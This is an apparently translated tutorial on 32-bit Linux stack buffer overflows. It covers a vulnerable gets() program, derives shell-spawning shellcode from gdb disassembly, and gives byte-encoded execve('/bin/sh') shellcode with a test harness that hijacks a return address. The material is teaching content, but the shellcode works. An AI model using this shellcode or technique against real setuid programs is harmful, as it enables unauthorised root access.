Overflows are a common bug in program development, and they pose a serious threat to the system. When a privileged program overflows, an attacker can exploit the vulnerability to obtain the system's highest privilege, root. This article therefore introduces stack overflow techniques in detail.
Before studying stack overflows, you should be familiar with 32-bit x86 assembly language and with the registers and their functions. You also need basic knowledge of the stack and of storage allocation. Many computer books cover these topics, so I will only sketch the principles and focus on applications. You should also know Linux, because the examples in this lecture are developed on Linux.
1. First, a review of the basics.
Physically, a stack is a contiguous region of memory. A program declares various variables. Static and global variables are located in the data segment and are loaded when the program starts running. The program's dynamic (local) variables are allocated on the stack.
Operationally, the stack is a last-in, first-out structure. Its growth direction is opposite to that of memory: we define the memory growth direction as up (toward higher addresses), so the stack grows down. A push performs ESP = ESP - 4, and a pop performs ESP = ESP + 4. In other words, an older value on the stack has a higher memory address than a newer value. Keep this in mind, because it is the theoretical basis of stack overflow.
During a function call, the following are pushed onto the stack in sequence: the parameters, the return address, and EBP. If the function has local variables, space for them is then reserved on the stack. When the function finishes, the contents of these local variables are lost, but they are not cleared. When the function returns, EBP is popped, restoring the stack to its state at the time of the call, and then the return address is popped into EIP so that the program continues executing.
In C programs, parameters are pushed in reverse order. For example, for func(a, b, c), the parameters are pushed in the order c, b, a. When the parameters are read, because the stack is last-in, first-out, a is nearest the top of the stack, then b, and finally c. This is basic assembly-language knowledge, and you must understand it before you begin.
2. Now let's see what Stack Overflow is.
Stack allocation during runtime
A stack overflow means that more data is written to a block of data on the stack than the block can hold. The write goes out of bounds and overwrites older data on the stack.
For example, program 1:
#include <stdio.h>
int main()
{
    char name[8];
    printf("Please type your name: ");
    gets(name);   /* no bounds check: this is the bug under study */
    printf("Hello, %s!", name);
    return 0;
}
Compile and run it. Enter ipxodi and the program prints Hello, ipxodi!. How does the stack behave while the program runs?
When main starts to run, the return address and then EBP are placed on the stack.
We use gcc -S to obtain the assembly-language output. The beginning of main corresponds to the following statements:
pushl %ebp
movl %esp, %ebp
subl $8, %esp
First it saves EBP, then sets EBP equal to the current ESP, so that EBP can be used to access the function's local variables. After that, 8 is subtracted from ESP; that is, the stack grows by 8 bytes to hold the name[] array. Finally, main returns: the address in ret is popped and assigned to EIP, and the CPU continues with the instruction that EIP points to.
Stack Overflow
Now let's run it again and enter ipxodiAAAAAAAAAAAAAAA. When gets(name) executes, the input string is too long for the name array, so the extra 'A' characters are written to higher memory addresses. Because the stack grows in the direction opposite to memory, these 'A's overwrite older elements of the stack. We find that EBP and ret have both been overwritten by 'A's. When main returns, the ASCII code of 'AAAA', 0x41414141, is used as the return address. The CPU tries to execute the instruction at 0x41414141 and a fault results. This is a stack overflow.
3. How to Use Stack Overflow
We have now produced a stack overflow. The principle can be summarized as follows: because string-handling functions (gets, strcpy, and so on) do not check or limit array bounds, we can write past the end of a character array, overwrite the older elements on the stack, and thereby modify the return address.
In the preceding example, this made the CPU fetch an instruction from an invalid address, and a fault resulted. In fact, once the stack has overflowed, we fully control the program's next action. If we overwrite the return address with the address of real instructions, the CPU will execute those instructions instead.
On UNIX/Linux systems, our instructions can execute a shell, which obtains the same permissions as the program whose stack we overflowed. If that program is setuid root, we get a root shell. The next section describes how to write shellcode.
How to write shellcode
1. Basic analysis of the shellcode algorithm
In C, a program that starts a shell can be written as follows:
shellcode.c
------------------------------------------------------------------------
#include <unistd.h>   /* declares execve */
int main() {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    return 0;
}
------------------------------------------------------------------------
The execve function executes a program. Its first parameter is the address of the program name. Its second parameter is an array of pointers holding the program's argv[i], terminated by a null pointer (argv[n-1] = 0). Its third parameter, the environment pointer, is (char *)0 here.
Let's take a look at execve's assembly code:
[nkl10]$ gcc -o shellcode -static shellcode.c
[nkl10]$ gdb shellcode
(gdb) disassemble __execve
Dump of assembler code for function __execve:
0x80002bc <__execve>: pushl %ebp
0x80002bd <__execve+1>: movl %esp, %ebp ; the two lines above are the function prologue
0x80002bf <__execve+3>: pushl %ebx ; save ebx
0x80002c0 <__execve+4>: movl $0xb, %eax ; eax = 0xb, the system call number
0x80002c5 <__execve+9>: movl 0x8(%ebp), %ebx ; ebp+8 is the first parameter, the address of "/bin/sh\0"
0x80002c8 <__execve+12>: movl 0xc(%ebp), %ecx ; ebp+12 is the second parameter, the address of the name array
0x80002cb <__execve+15>: movl 0x10(%ebp), %edx ; ebp+16 is the third parameter, the NULL pointer (name[2-1] also holds NULL)
0x80002ce <__execve+18>: int $0x80 ; execute system call 0xb (execve)
0x80002d0 <__execve+20>: movl %eax, %edx ; the return-value handling below is of no use to us
0x80002d2 <__execve+22>: testl %edx, %edx
0x80002d4 <__execve+24>: jnl 0x80002e6 <__execve+42>
0x80002d6 <__execve+26>: negl %edx
0x80002d8 <__execve+28>: pushl %edx
0x80002d9 <__execve+29>: call 0x8001a34 <__normal_errno_location>
0x80002de <__execve+34>: popl %edx
0x80002df <__execve+35>: movl %edx, (%eax)
0x80002e1 <__execve+37>: movl $0xffffffff, %eax
0x80002e6 <__execve+42>: popl %ebx
0x80002e7 <__execve+43>: movl %ebp, %esp
0x80002e9 <__execve+45>: popl %ebp
0x80002ea <__execve+46>: ret
0x80002eb <__execve+47>: nop
End of assembler dump.
From the analysis above, we obtain the following simplified sequence of instructions:
movl $(execve system call number), %eax
movl (address of "/bin/sh\0"), %ebx
movl (address of the name array), %ecx
movl (address of name[n-1]), %edx
int $0x80 ; execve
If execve succeeds, the shellcode program stops running and /bin/sh takes over the process and keeps running. However, if execve fails (for example, because there is no /bin/sh file), the CPU goes on executing whatever instructions follow, with unpredictable results. Therefore an exit() system call must follow, to end the execution of shellcode.c.
Let's take a look at the assembly code of exit(0):
(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x800034c <_exit>: pushl %ebp
0x800034d <_exit+1>: movl %esp, %ebp
0x800034f <_exit+3>: pushl %ebx
0x8000350 <_exit+4>: movl $0x1, %eax ; system call number 1
0x8000355 <_exit+9>: movl 0x8(%ebp), %ebx ; ebx holds the parameter, 0
0x8000358 <_exit+12>: int $0x80 ; trigger the system call
0x800035a <_exit+14>: movl 0xfffffffc(%ebp), %ebx
0x800035d <_exit+17>: movl %ebp, %esp
0x800035f <_exit+19>: popl %ebp
0x8000360 <_exit+20>: ret
0x8000361 <_exit+21>: nop
0x8000362 <_exit+22>: nop
0x8000363 <_exit+23>: nop
End of assembler dump.
The assembly code for exit(0) turns out to be simpler:
movl $0x1, %eax ; system call number 1 (exit)
movl $0, %ebx ; ebx holds exit's parameter, 0
int $0x80 ; trigger the system call
To sum up, the merged assembly code is:
movl $(execve system call number), %eax
movl (address of "/bin/sh\0"), %ebx
movl (address of the name array), %ecx
movl (address of name[n-1]), %edx
int $0x80 ; execute system call (execve)
movl $0x1, %eax ; system call number 1 (exit)
movl $0, %ebx ; ebx holds exit's parameter, 0
int $0x80 ; execute system call (exit)
2. Implement a shellcode
Now let's implement this algorithm. First, we need the string "/bin/sh" and a name array. We can construct them, but how does the shellcode learn their addresses? Each time the code is loaded, the addresses of the string and the name array are different. Hackers solved this problem cleverly by combining jmp and call.
------------------------------------------------------------------------
jmp   offset-to-call               # 2 bytes
popl  %esi                         # 1 byte  // the popped value is the string address
movl  %esi, array-offset(%esi)     # 3 bytes // build the name array at string+8; name[0] holds the string address
movb  $0x0, nullbyteoffset(%esi)   # 4 bytes // put 0 at string+7 to terminate the string
movl  $0x0, null-offset(%esi)      # 7 bytes // name[1] holds 0
movl  $0xb, %eax                   # 5 bytes // eax = 0xb, the execve syscall number
movl  %esi, %ebx                   # 2 bytes // ebx = address of the string
leal  array-offset(%esi), %ecx     # 3 bytes // ecx = start address of the name array
leal  null-offset(%esi), %edx      # 3 bytes // edx = address of name[1]
int   $0x80                        # 2 bytes // int 0x80 makes the system call
movl  $0x1, %eax                   # 5 bytes // eax = 0x1, the exit syscall number
movl  $0x0, %ebx                   # 5 bytes // ebx = 0, the exit status
int   $0x80                        # 2 bytes // int 0x80 makes the system call
call  offset-to-popl               # 5 bytes // the call goes here; the string address is pushed as its return address
/bin/sh string goes here.
------------------------------------------------------------------------
First, jmp uses a relative address to jump to the call. When the call instruction executes, the address of the string /bin/sh is pushed onto the stack as the call's return address. Execution then reaches popl %esi, which pops that address and so obtains the real address of the string. Next, 0 is stored in the 8th byte of the string (offset 7) to terminate it. The following 8 bytes hold the name array: two 4-byte integers.
Now we can write the shellcode. First write the assembly source program.
shellcodeasm.c
------------------------------------------------------------------------
void main() {
__asm__("
    jmp 0x2a                    # 2 bytes
    popl %esi                   # 1 byte
    movl %esi, 0x8(%esi)        # 3 bytes
    movb $0x0, 0x7(%esi)        # 4 bytes
    movl $0x0, 0xc(%esi)        # 7 bytes
    movl $0xb, %eax             # 5 bytes
    movl %esi, %ebx             # 2 bytes
    leal 0x8(%esi), %ecx        # 3 bytes
    leal 0xc(%esi), %edx        # 3 bytes
    int $0x80                   # 2 bytes
    movl $0x1, %eax             # 5 bytes
    movl $0x0, %ebx             # 5 bytes
    int $0x80                   # 2 bytes
    call -0x2f                  # 5 bytes
    .string \"/bin/sh\"         # 8 bytes
");
}
After compiling, use gdb's x/bx [address] command to obtain the hexadecimal representation.
Next, write the following test program. (Note that this is the basic harness for testing shellcode.)
test.c
char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
void main() {
    int *ret;
    ret = (int *)&ret + 2;      // ret now points at main()'s return address
                                // (+2 because of the pushl %ebp; otherwise +1 would do)
    (*ret) = (int)shellcode;    // set main()'s return address to the start of shellcode
}
[nkl10]$ gcc -o test test.c
[nkl10]$ ./test
$ exit
[nkl10]$
We store the shellcode in the shellcode array. When main's return address ret is set to the starting address of the shellcode array, the program executes our shellcode on return, and we get a shell. Running the program produces the sh prompt $, which shows that a shell was opened successfully.
One point needs explaining: we placed the shellcode in the data segment as a global variable rather than writing it as a piece of code. The operating system marks a program's code segment read-only, so it cannot be modified. Statements in our code such as movl %esi, 0x8(%esi) modify memory inside the shellcode itself, so the shellcode cannot live in the code segment.
Is this shellcode good enough? Unfortunately, not quite. Recall that the key to a stack overflow is writing past the end of a string array. String functions such as strcpy treat "\0" as the end of the string and stop writing when they reach it. (gets stops at a newline rather than at "\0", but an overflow through strcpy and its relatives is cut short at the first "\0".) Our shellcode string contains a large number of \0 bytes, so in general the shellcode above is not usable. Our shellcode must not contain any \0 bytes.
Therefore, some instructions need to be replaced:
Old instructions               New instructions
movb $0x0, 0x7(%esi)           xorl %eax, %eax
movl $0x0, 0xc(%esi)           movb %al, 0x7(%esi)
                               movl %eax, 0xc(%esi)
--------------------------------------------------------
movl $0xb, %eax                movb $0xb, %al
--------------------------------------------------------
movl $0x1, %eax                xorl %ebx, %ebx
movl $0x0, %ebx                movl %ebx, %eax
                               inc %eax
--------------------------------------------------------
The final shellcode is:
------------------------------------------------------------------------
char shellcode[] =
"\xeb\x1f"              /* 00: jmp 0x1f */
"\x5e"                  /* 02: popl %esi */
"\x89\x76\x08"          /* 03: movl %esi, 0x8(%esi) */
"\x31\xc0"              /* 06: xorl %eax, %eax */
"\x88\x46\x07"          /* 08: movb %al, 0x7(%esi) */
"\x89\x46\x0c"          /* 0b: movl %eax, 0xc(%esi) */
"\xb0\x0b"              /* 0e: movb $0xb, %al */
"\x89\xf3"              /* 10: movl %esi, %ebx */
"\x8d\x4e\x08"          /* 12: leal 0x8(%esi), %ecx */
"\x8d\x56\x0c"          /* 15: leal 0xc(%esi), %edx */
"\xcd\x80"              /* 18: int $0x80 */
"\x31\xdb"              /* 1a: xorl %ebx, %ebx */
"\x89\xd8"              /* 1c: movl %ebx, %eax */
"\x40"                  /* 1e: inc %eax */
"\xcd\x80"              /* 1f: int $0x80 */
"\xe8\xdc\xff\xff\xff"  /* 21: call -0x24 */
"/bin/sh";              /* 26: .string \"/bin/sh\" */